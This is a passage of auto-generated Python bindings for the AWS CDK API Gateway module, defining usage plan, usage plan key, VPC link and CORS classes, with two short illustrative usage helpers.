def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_stages: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "ApiStageProperty"]]]]]=None, description: typing.Optional[str]=None, quota: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["QuotaSettingsProperty"]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, throttle: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["ThrottleSettingsProperty"]]]=None, usage_plan_name: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::UsagePlan``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_stages: ``AWS::ApiGateway::UsagePlan.ApiStages``.
:param description: ``AWS::ApiGateway::UsagePlan.Description``.
:param quota: ``AWS::ApiGateway::UsagePlan.Quota``.
:param tags: ``AWS::ApiGateway::UsagePlan.Tags``.
:param throttle: ``AWS::ApiGateway::UsagePlan.Throttle``.
:param usage_plan_name: ``AWS::ApiGateway::UsagePlan.UsagePlanName``.
"""
props = CfnUsagePlanProps(api_stages=api_stages, description=description, quota=quota, tags=tags, throttle=throttle, usage_plan_name=usage_plan_name)
jsii.create(CfnUsagePlan, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::UsagePlan.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="apiStages")
def api_stages(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "ApiStageProperty"]]]]]:
"""``AWS::ApiGateway::UsagePlan.ApiStages``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-apistages
"""
return jsii.get(self, "apiStages")
@api_stages.setter
def api_stages(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "ApiStageProperty"]]]]]):
return jsii.set(self, "apiStages", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="quota")
def quota(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["QuotaSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Quota``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-quota
"""
return jsii.get(self, "quota")
@quota.setter
def quota(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["QuotaSettingsProperty"]]]):
return jsii.set(self, "quota", value)
@property
@jsii.member(jsii_name="throttle")
def throttle(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["ThrottleSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-throttle
"""
return jsii.get(self, "throttle")
@throttle.setter
def throttle(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["ThrottleSettingsProperty"]]]):
return jsii.set(self, "throttle", value)
@property
@jsii.member(jsii_name="usagePlanName")
def usage_plan_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.UsagePlanName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-usageplanname
"""
return jsii.get(self, "usagePlanName")
@usage_plan_name.setter
def usage_plan_name(self, value: typing.Optional[str]):
return jsii.set(self, "usagePlanName", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan.ApiStageProperty", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'stage': 'stage', 'throttle': 'throttle'})
class ApiStageProperty():
def __init__(self, *, api_id: typing.Optional[str]=None, stage: typing.Optional[str]=None, throttle: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ThrottleSettingsProperty"]]]]]=None):
"""
:param api_id: ``CfnUsagePlan.ApiStageProperty.ApiId``.
:param stage: ``CfnUsagePlan.ApiStageProperty.Stage``.
:param throttle: ``CfnUsagePlan.ApiStageProperty.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html
"""
self._values = {
}
if api_id is not None: self._values["api_id"] = api_id
if stage is not None: self._values["stage"] = stage
if throttle is not None: self._values["throttle"] = throttle
@property
def api_id(self) -> typing.Optional[str]:
"""``CfnUsagePlan.ApiStageProperty.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html#cfn-apigateway-usageplan-apistage-apiid
"""
return self._values.get('api_id')
@property
def stage(self) -> typing.Optional[str]:
"""``CfnUsagePlan.ApiStageProperty.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html#cfn-apigateway-usageplan-apistage-stage
"""
return self._values.get('stage')
@property
def throttle(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ThrottleSettingsProperty"]]]]]:
"""``CfnUsagePlan.ApiStageProperty.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html#cfn-apigateway-usageplan-apistage-throttle
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ApiStageProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan.QuotaSettingsProperty", jsii_struct_bases=[], name_mapping={'limit': 'limit', 'offset': 'offset', 'period': 'period'})
class QuotaSettingsProperty():
def __init__(self, *, limit: typing.Optional[jsii.Number]=None, offset: typing.Optional[jsii.Number]=None, period: typing.Optional[str]=None):
"""
:param limit: ``CfnUsagePlan.QuotaSettingsProperty.Limit``.
:param offset: ``CfnUsagePlan.QuotaSettingsProperty.Offset``.
:param period: ``CfnUsagePlan.QuotaSettingsProperty.Period``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html
"""
self._values = {
}
if limit is not None: self._values["limit"] = limit
if offset is not None: self._values["offset"] = offset
if period is not None: self._values["period"] = period
@property
def limit(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.QuotaSettingsProperty.Limit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html#cfn-apigateway-usageplan-quotasettings-limit
"""
return self._values.get('limit')
@property
def offset(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.QuotaSettingsProperty.Offset``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html#cfn-apigateway-usageplan-quotasettings-offset
"""
return self._values.get('offset')
@property
def period(self) -> typing.Optional[str]:
"""``CfnUsagePlan.QuotaSettingsProperty.Period``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html#cfn-apigateway-usageplan-quotasettings-period
"""
return self._values.get('period')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'QuotaSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan.ThrottleSettingsProperty", jsii_struct_bases=[], name_mapping={'burst_limit': 'burstLimit', 'rate_limit': 'rateLimit'})
class ThrottleSettingsProperty():
def __init__(self, *, burst_limit: typing.Optional[jsii.Number]=None, rate_limit: typing.Optional[jsii.Number]=None):
"""
:param burst_limit: ``CfnUsagePlan.ThrottleSettingsProperty.BurstLimit``.
:param rate_limit: ``CfnUsagePlan.ThrottleSettingsProperty.RateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-throttlesettings.html
"""
self._values = {
}
if burst_limit is not None: self._values["burst_limit"] = burst_limit
if rate_limit is not None: self._values["rate_limit"] = rate_limit
@property
def burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.ThrottleSettingsProperty.BurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-throttlesettings.html#cfn-apigateway-usageplan-throttlesettings-burstlimit
"""
return self._values.get('burst_limit')
@property
def rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.ThrottleSettingsProperty.RateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-throttlesettings.html#cfn-apigateway-usageplan-throttlesettings-ratelimit
"""
return self._values.get('rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ThrottleSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
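# Illustrative usage sketch: a usage plan that throttles clients to 10
# requests per second (burst 20) and caps them at 1000 requests per month.
# ``scope`` is an existing construct; the api/stage names are hypothetical.
def _example_usage_plan(scope: aws_cdk.core.Construct) -> "CfnUsagePlan":
    return CfnUsagePlan(
        scope, "ExampleUsagePlan",
        usage_plan_name="basic",
        api_stages=[CfnUsagePlan.ApiStageProperty(api_id="api12345", stage="prod")],
        quota=CfnUsagePlan.QuotaSettingsProperty(limit=1000, period="MONTH"),
        throttle=CfnUsagePlan.ThrottleSettingsProperty(burst_limit=20, rate_limit=10),
    )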
@jsii.implements(aws_cdk.core.IInspectable)
class CfnUsagePlanKey(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlanKey"):
"""A CloudFormation ``AWS::ApiGateway::UsagePlanKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::UsagePlanKey
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, key_id: str, key_type: str, usage_plan_id: str) -> None:
"""Create a new ``AWS::ApiGateway::UsagePlanKey``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param key_id: ``AWS::ApiGateway::UsagePlanKey.KeyId``.
:param key_type: ``AWS::ApiGateway::UsagePlanKey.KeyType``.
:param usage_plan_id: ``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
"""
props = CfnUsagePlanKeyProps(key_id=key_id, key_type=key_type, usage_plan_id=usage_plan_id)
jsii.create(CfnUsagePlanKey, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keyid
"""
return jsii.get(self, "keyId")
@key_id.setter
def key_id(self, value: str):
return jsii.set(self, "keyId", value)
@property
@jsii.member(jsii_name="keyType")
def key_type(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keytype
"""
return jsii.get(self, "keyType")
@key_type.setter
def key_type(self, value: str):
return jsii.set(self, "keyType", value)
@property
@jsii.member(jsii_name="usagePlanId")
def usage_plan_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-usageplanid
"""
return jsii.get(self, "usagePlanId")
@usage_plan_id.setter
def usage_plan_id(self, value: str):
return jsii.set(self, "usagePlanId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlanKeyProps", jsii_struct_bases=[], name_mapping={'key_id': 'keyId', 'key_type': 'keyType', 'usage_plan_id': 'usagePlanId'})
class CfnUsagePlanKeyProps():
def __init__(self, *, key_id: str, key_type: str, usage_plan_id: str):
"""Properties for defining a ``AWS::ApiGateway::UsagePlanKey``.
:param key_id: ``AWS::ApiGateway::UsagePlanKey.KeyId``.
:param key_type: ``AWS::ApiGateway::UsagePlanKey.KeyType``.
:param usage_plan_id: ``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html
"""
self._values = {
'key_id': key_id,
'key_type': key_type,
'usage_plan_id': usage_plan_id,
}
@property
def key_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keyid
"""
return self._values.get('key_id')
@property
def key_type(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keytype
"""
return self._values.get('key_type')
@property
def usage_plan_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-usageplanid
"""
return self._values.get('usage_plan_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnUsagePlanKeyProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
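# Illustrative sketch: these generated props classes have value semantics, so
# instances built from identical keyword arguments compare equal.
def _example_props_equality() -> bool:
    a = CfnUsagePlanKeyProps(key_id="k1", key_type="API_KEY", usage_plan_id="p1")
    b = CfnUsagePlanKeyProps(key_id="k1", key_type="API_KEY", usage_plan_id="p1")
    return a == b  # True: __eq__ compares the underlying _values dicts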
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlanProps", jsii_struct_bases=[], name_mapping={'api_stages': 'apiStages', 'description': 'description', 'quota': 'quota', 'tags': 'tags', 'throttle': 'throttle', 'usage_plan_name': 'usagePlanName'})
class CfnUsagePlanProps():
def __init__(self, *, api_stages: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ApiStageProperty"]]]]]=None, description: typing.Optional[str]=None, quota: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.QuotaSettingsProperty"]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, throttle: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.ThrottleSettingsProperty"]]]=None, usage_plan_name: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::UsagePlan``.
:param api_stages: ``AWS::ApiGateway::UsagePlan.ApiStages``.
:param description: ``AWS::ApiGateway::UsagePlan.Description``.
:param quota: ``AWS::ApiGateway::UsagePlan.Quota``.
:param tags: ``AWS::ApiGateway::UsagePlan.Tags``.
:param throttle: ``AWS::ApiGateway::UsagePlan.Throttle``.
:param usage_plan_name: ``AWS::ApiGateway::UsagePlan.UsagePlanName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html
"""
self._values = {
}
if api_stages is not None: self._values["api_stages"] = api_stages
if description is not None: self._values["description"] = description
if quota is not None: self._values["quota"] = quota
if tags is not None: self._values["tags"] = tags
if throttle is not None: self._values["throttle"] = throttle
if usage_plan_name is not None: self._values["usage_plan_name"] = usage_plan_name
@property
def api_stages(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ApiStageProperty"]]]]]:
"""``AWS::ApiGateway::UsagePlan.ApiStages``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-apistages
"""
return self._values.get('api_stages')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-description
"""
return self._values.get('description')
@property
def quota(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.QuotaSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Quota``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-quota
"""
return self._values.get('quota')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::UsagePlan.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-tags
"""
return self._values.get('tags')
@property
def throttle(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.ThrottleSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-throttle
"""
return self._values.get('throttle')
@property
def usage_plan_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.UsagePlanName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-usageplanname
"""
return self._values.get('usage_plan_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnUsagePlanProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnVpcLink(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnVpcLink"):
"""A CloudFormation ``AWS::ApiGateway::VpcLink``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::VpcLink
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, name: str, target_arns: typing.List[str], description: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::VpcLink``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param name: ``AWS::ApiGateway::VpcLink.Name``.
:param target_arns: ``AWS::ApiGateway::VpcLink.TargetArns``.
:param description: ``AWS::ApiGateway::VpcLink.Description``.
"""
props = CfnVpcLinkProps(name=name, target_arns=target_arns, description=description)
jsii.create(CfnVpcLink, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGateway::VpcLink.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="targetArns")
def target_arns(self) -> typing.List[str]:
"""``AWS::ApiGateway::VpcLink.TargetArns``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-targetarns
"""
return jsii.get(self, "targetArns")
@target_arns.setter
def target_arns(self, value: typing.List[str]):
return jsii.set(self, "targetArns", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::VpcLink.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnVpcLinkProps", jsii_struct_bases=[], name_mapping={'name': 'name', 'target_arns': 'targetArns', 'description': 'description'})
class CfnVpcLinkProps():
def __init__(self, *, name: str, target_arns: typing.List[str], description: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::VpcLink``.
:param name: ``AWS::ApiGateway::VpcLink.Name``.
:param target_arns: ``AWS::ApiGateway::VpcLink.TargetArns``.
:param description: ``AWS::ApiGateway::VpcLink.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html
"""
self._values = {
'name': name,
'target_arns': target_arns,
}
if description is not None: self._values["description"] = description
@property
def name(self) -> str:
"""``AWS::ApiGateway::VpcLink.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-name
"""
return self._values.get('name')
@property
def target_arns(self) -> typing.List[str]:
"""``AWS::ApiGateway::VpcLink.TargetArns``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-targetarns
"""
return self._values.get('target_arns')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::VpcLink.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-description
"""
return self._values.get('description')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnVpcLinkProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.ConnectionType")
class ConnectionType(enum.Enum):
INTERNET = "INTERNET"
"""For connections through the public routable internet."""
VPC_LINK = "VPC_LINK"
"""For private connections between API Gateway and a network load balancer in a VPC."""
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.ContentHandling")
class ContentHandling(enum.Enum):
CONVERT_TO_BINARY = "CONVERT_TO_BINARY"
"""Converts a request payload from a base64-encoded string to a binary blob."""
CONVERT_TO_TEXT = "CONVERT_TO_TEXT"
"""Converts a request payload from a binary blob to a base64-encoded string."""
class Cors(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Cors"):
@classproperty
@jsii.member(jsii_name="ALL_METHODS")
def ALL_METHODS(cls) -> typing.List[str]:
"""All HTTP methods."""
return jsii.sget(cls, "ALL_METHODS")
@classproperty
@jsii.member(jsii_name="ALL_ORIGINS")
def ALL_ORIGINS(cls) -> typing.List[str]:
"""All origins."""
return jsii.sget(cls, "ALL_ORIGINS")
@classproperty
@jsii.member(jsii_name="DEFAULT_HEADERS")
def DEFAULT_HEADERS(cls) -> typing.List[str]:
"""The set of default headers allowed for CORS and useful for API Gateway."""
return jsii.sget(cls, "DEFAULT_HEADERS")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CorsOptions", jsii_struct_bases=[], name_mapping={'allow_origins': 'allowOrigins', 'allow_credentials': 'allowCredentials', 'allow_headers': 'allowHeaders', 'allow_methods': 'allowMethods', 'disable_cache': 'disableCache', 'expose_headers': 'exposeHeaders', 'max_age': 'maxAge', 'status_code': 'statusCode'})
class CorsOptions():
def __init__(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None):
"""
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
